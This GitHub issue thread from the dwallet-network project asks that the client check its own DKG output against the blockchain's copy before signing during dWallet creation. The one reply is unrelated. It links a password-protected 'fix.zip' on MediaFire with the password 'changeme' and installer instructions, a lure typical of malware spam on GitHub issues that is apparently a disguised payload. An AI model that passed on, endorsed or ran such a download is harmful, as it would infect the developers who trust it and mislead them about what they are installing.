### ISSUE TITLE
Verify the blockchain DKG output before signing on it, DWallet creation

### ISSUE THREAD

**Issue by ItayLevyOfficial** [dwallet-labs/dwallet-network#190]
_When you create the dWallet, you just did DKG with the blockchain. So you have your own DKG output (the centralized_party::dkg::Output), and you can make sure the values are the same as the one saved on the blockchain (the decentralized_party::dkg::Output). After you do, it is safe to sign._, mentioned [here](https://github.com/dwallet-labs/dwallet-network/pull/183#discussion_r1732662682)

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
